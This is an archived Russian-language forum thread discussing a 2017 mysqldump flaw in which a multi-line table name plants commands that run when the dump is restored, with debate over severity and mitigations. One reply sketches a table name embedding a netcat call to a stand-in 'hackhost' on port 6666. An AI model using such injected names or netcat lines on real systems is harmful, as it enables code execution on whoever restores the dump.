Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Уязвимость в mysqldump, позволяющая выполнить код при восста..., opennews (ok), 11-Мрт-17, (0) [смотреть все] Ну и бред Уязвимость тут на столько мифическая, что о ней можно и не говорить, Gemorroj (ok), 10:11 , 11-Мрт-17, (1) –12 // Не согласен, уязвимость хороша именно тем, что на первый взгляд кажется бесполез, Аноним (-), 10:16 , 11-Мрт-17, (2) +5 // Да, но это скорее еще один трюк из разряда методов социнженерии, чем реальная уя, KonstantinB (ok), 17:00 , 11-Мрт-17, (36) –1 // Более того, можно сделать так чтобы через браузер показывалось одно, а при загру, Аноним (-), 18:25 , 11-Мрт-17, (39) Ясен пень, что смотреть надо то, что запускать собрался, а не что там в браузере, KonstantinB (ok), 20:57 , 11-Мрт-17, (45) А в чем принципиальное отличие от старомодного скачать и запустить , angra (ok), 21:35 , 11-Мрт-17, (48) Старомодное предполагает разумный промежуточный шаг посмотреть, что собрался за, KonstantinB (ok), 21:41 , 11-Мрт-17, (49) Ни разу не видел, чтобы в инструкции был шаг Посмотрите, что вы собираетесь зап, angra (ok), 23:34 , 11-Мрт-17, (51) Не работайте под рутом тоже обычно не пишут в инструкциях по установке ПО Я о , KonstantinB (ok), 23:53 , 11-Мрт-17, (52) Вообще-то обычно в инструкциях указывается какие шаги делаются под пользователем, angra (ok), 00:25 , 12-Мрт-17, (56) Если curl взбрыкивает , то проблема либо с MITM, либо с тем местом, откуда раст, KonstantinB (ok), 03:27 , 13-Мрт-17, (64) –1 Сдается мне, что кое-кто не знает как работает механизм доверия ssl сертификату , angra (ok), 06:43 , 13-Мрт-17, (66) про -k и его более длинный алиас curl, кажется, сам подсказывает - если с wget, тигар (ok), 09:18 , 13-Мрт-17, (69) Очень даже может быть Но в таких случаях обычно звучит что-то вроде я же не ад, angra (ok), 10:15 , 13-Мрт-17, (71) Дада, проверьте что там в несколькогигабайтовом дампе базы данных, а потом расск, deadfood (ok), 20:13 , 12-Мрт-17, (61) +1 Если дамп мой - я и так знаю, что в нем Если нет - то в голову никогда не придет, KonstantinB (ok), 03:30 , 13-Мрт-17, (65) –1 в нем - create table shit nc hackhost 6666 dev null nc -, пох (?), 13:05 , 13-Мрт-17, (72) В дамп из-за sql injection Ну-ка наваляйте proof of concept , KonstantinB (ok), 16:00 , 13-Мрт-17, (75) только реалистичный, а не код, создающий динамически таблицы с подстановкой п, KonstantinB (ok), 16:04 , 13-Мрт-17, (76) 1 арендуешь шаредхостинг 2 создаешь сайт визитку 3 в mysql делаешь табличку , Аноним (-), 12:05 , 11-Мрт-17, (12) +6 // чем это отличается от ручного выполнения sql запроса из той же админки то, что , Gemorroj (ok), 12:58 , 11-Мрт-17, (14) –2 // Восстановление может делаться из-под более привилегированного юзера , Аноним (-), 18:27 , 11-Мрт-17, (40) +6 А почему собственно косяк в парсере не может быть уязвимостью , apollo2k4 (ok), 12:14 , 11-Мрт-17, (13) +3 // конкретно в mysqldump она не имеет ценности в силу сложности ее использования а, Gemorroj (ok), 13:00 , 11-Мрт-17, (15) –2 // Если вы не можете придумать, как это использовать, это не означает, что это нево, XoRe (ok), 23:55 , 11-Мрт-17, (53) +2 Каку надо писой мыть , Павел Самсонов (?), 13:18 , 11-Мрт-17, (18) +2 // И ещё подкладывть бумажку, и кушать ампицилин , Павел Самсонов (?), 13:23 , 11-Мрт-17, (20) Один сценарий для ее использования таки существует Дампу, снятому самостоятельн, angra (ok), 13:39 , 11-Мрт-17, (24) А часто ли бывает, что кто-то имеет право создавать таблицы, но не может делать , Аноним (-), 10:16 , 11-Мрт-17, (3) // Дефолтовые настройки аккаунта для WordPress , Аноним (-), 10:39 , 11-Мрт-17, (4) А какая разница Даже если бы злоумышленник мог делать дамп и восстанавливать, э, Аноним (-), 10:44 , 11-Мрт-17, (5) // А что раньше мешало подкинуть этому аккаунту исправленный дамп Дампы то у кли, angra (ok), 13:42 , 11-Мрт-17, (25) // Когда дампы хранятся у клиентов, то и восстанавливают их обычно клиенты , Аноним (-), 14:21 , 11-Мрт-17, (32) Разве что в идеальном мире Где все клиенты люди умные и знающие, а сисадмины ну, angra (ok), 21:32 , 11-Мрт-17, (47) Первые два абзаца полная чущь Причём здесь утилита mysqldump В оригинале ясно , Ydro (?), 11:19 , 11-Мрт-17, (8) –6 // Это вы не так поняли В оригинале написано как раз про атаку через выполнение CR, Аноним (-), 11:45 , 11-Мрт-17, (11) // У вас первый абзац оригинальной статьи видимо не отображается mysqldump is a co, Ydro (?), 13:19 , 11-Мрт-17, (19) –3   // Разъясняю для непонятливых Злоумышленник создаёт в БД таблицу с многострочным и, Аноним (-), 14:28 , 11-Мрт-17, (33)   1 mysqldump создаёт обычный кекстовый файл, sql-скрипт, с комментариями и проче, oopsy (?), 14:13 , 11-Мрт-17, (31) –1 // Не надо расписывать как работает mysqldump И отчего вы забыли другие виды комме, Ydro (?), 11:38 , 12-Мрт-17, (60) –2 Так 10 1 21 подвержена этой уязвимости или нет P S В оригинале понятно что не, Ilya Indigo (ok), 11:27 , 11-Мрт-17, (9) // Там в новости ссылка на CVE по ней пройди и увидишь, что в ветке 10 1 исправлено, КО (?), 19:34 , 11-Мрт-17, (43) +1 // Благодарю , Ilya Indigo (ok), 01:00 , 12-Мрт-17, (57) Ах эта тяга к идеализму С точки зрения промышленного станка - надёжность на д, Павел Самсонов (?), 13:01 , 11-Мрт-17, (16) Бывают случаи, когда хостер переносит базу с другого хостинга или восстанавливае, Alex_K (??), 13:17 , 11-Мрт-17, (17) +1 // ШОК Оказывается нельзя выполнять произвольный sql от рута, а надо логиниться , angra (ok), 13:28 , 11-Мрт-17, (21) +4 // Самое печальное, что при этом приходится сидеть на его стуле , Павел Самсонов (?), 13:30 , 11-Мрт-17, (22) // Как тут любит говорить Led, эникеи должны страдать Не хочешь работать ногами, р, angra (ok), 13:32 , 11-Мрт-17, (23) +1 Работать ногами - не есть плохо Жим платформы ногами, например Но и головой дум, vitvegl (?), 14:06 , 11-Мрт-17, (30) Хоть иногда стенки сверлю, а то как же дом построить , Павел Самсонов (?), 14:32 , 11-Мрт-17, (34) Не путайте пользователя root внутри mysql и системного пользователя , Alex_K (??), 13:45 , 11-Мрт-17, (26) // Я и не путаю Я вообще-то про обоих говорил Принцип один и тот же , angra (ok), 13:51 , 11-Мрт-17, (27) Ок , Alex_K (??), 14:02 , 11-Мрт-17, (29) Да какая разница, тот кто восстанавливает бакап обычно имеет права на файлы БД, , КО (?), 19:37 , 11-Мрт-17, (44) +1 Выводы 1 Под рутом ОС загружать сторонний дамп нельзя из-заsystem Exec, Alex_K (??), 14:00 , 11-Мрт-17, (28) +1 // нет, неправильные Правильные сторонний или даже собственноручный разницы совер, тоже аноним (?), 16:31 , 11-Мрт-17, (35) // Да и у тебя они не правильные Действия для пользователя, требующие только знан, angra (ok), 17:39 , 11-Мрт-17, (37) –1 я не знаю пароля пользователя И не имею ни малейшего желания его знать su для s, Анон_ (?), 00:03 , 12-Мрт-17, (54) +1 Ну если ты ничего о мускуле знать не хочешь, то тебе наверное лучше его не админ, angra (ok), 03:25 , 12-Мрт-17, (59) –1 apt-get remove mysqld d windows_server setup exe , Аноним (-), 08:23 , 13-Мрт-17, (68) apt-get remove работает с именами пакетов, а не бинарей на диске Ну это тебе ви, angra (ok), 10:13 , 13-Мрт-17, (70) mysql в ней ровно тот же самый и из того же источника А mssql для вебни не внут, пох (?), 17:10 , 13-Мрт-17, (78) Это, кстати, проблема именно mysql В postgresql это решаемо , KonstantinB (ok), 17:43 , 11-Мрт-17, (38) Отложить в сторонку хеш пароля пользователя, установить случайный длинный, прийт, mickvav (?), 14:27 , 14-Мрт-17, (79) Как вариант перед импортом дампа вырезать из него строки, которые начинаются с s, Alex_K (??), 19:03 , 11-Мрт-17, (41) –1 // Ну вот какую глупость только не придумают, лишь бы не делать правильно Ну выпол, angra (ok), 21:29 , 11-Мрт-17, (46) Аутиста по решению важных вопросов видно из-далека , Аноним (-), 21:46 , 11-Мрт-17, (50) –1 правильная обработка untrusted input заключается ровно в обратном - вырезать все, Анон_ (?), 00:07 , 12-Мрт-17, (55) Двойной тоже рвется , Сифилис (?), 01:49 , 12-Мрт-17, (58) В MySQL все еще не завезли нормальные ACL для разграничения Events, Trigger, , Аноним (-), 19:31 , 11-Мрт-17, (42) –1 Вообще, это большой пласт проблем, на которые в mysql никогда даже не хотели раз, gogo (?), 21:08 , 12-Мрт-17, (62) // MySQL - Legacy РСБД с грязными хаками как IE6 для веб-макак Не имеет ничего обще, Аноним (-), 21:26 , 12-Мрт-17, (63) –1 // была бы она не для веб-макак, было бы пофигу, что там нет нормального restore Э, пох (?), 13:15 , 13-Мрт-17, (73) Ну, всё, конец света, вырубайте комп А прогнать дамп на поиск сочетания нежелат, Ydro (?), 08:22 , 13-Мрт-17, (67) –2 // а в дампе - статья с опеннета, описывающая проблему ну либо вовсе статья о разр, пох (?), 13:24 , 13-Мрт-17, (74) +2 1,3,8,9,16,17,42,62

Сообщения

[Сортировка по времени | RSS]

	19. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	–3 +/–
	Сообщение от Ydro (?), 11-Мрт-17, 13:19
	У вас первый абзац оригинальной статьи видимо не отображается? mysqldump is a common utility used to create logical backups of MySQL databases. By default, it generates a .sql file containing the queries to create/drop tables and insert your data. By crafting malicious table name, an attacker can execute arbitrary SQL queries and shell commands if the dump file is imported. Обратите внимание на последнее слово imported, что явно указывает на импорт данных из файла в БД, а НЕ НАОБОРОТ (создание файла дампа при помощи утилиты mysqldump)
	Ответить | Правка | Наверх | Cообщить модератору

	33. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+/–
	Сообщение от Аноним (-), 11-Мрт-17, 14:28
	Разъясняю для непонятливых. Злоумышленник создаёт в БД таблицу с многострочным именем. Команда mysqldump, наткнувшись на такую таблицу, вставляет в дамп все строки имени, кроме первой, как команды, а не часть имени. Поскольку команду mysqldump запускал доверенный пользователь, то и в доверенности дампа сомнений не возникает. Но при попытке из него восстановиться запускаются эти внедрённые команды. Теперь понятно?
	Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема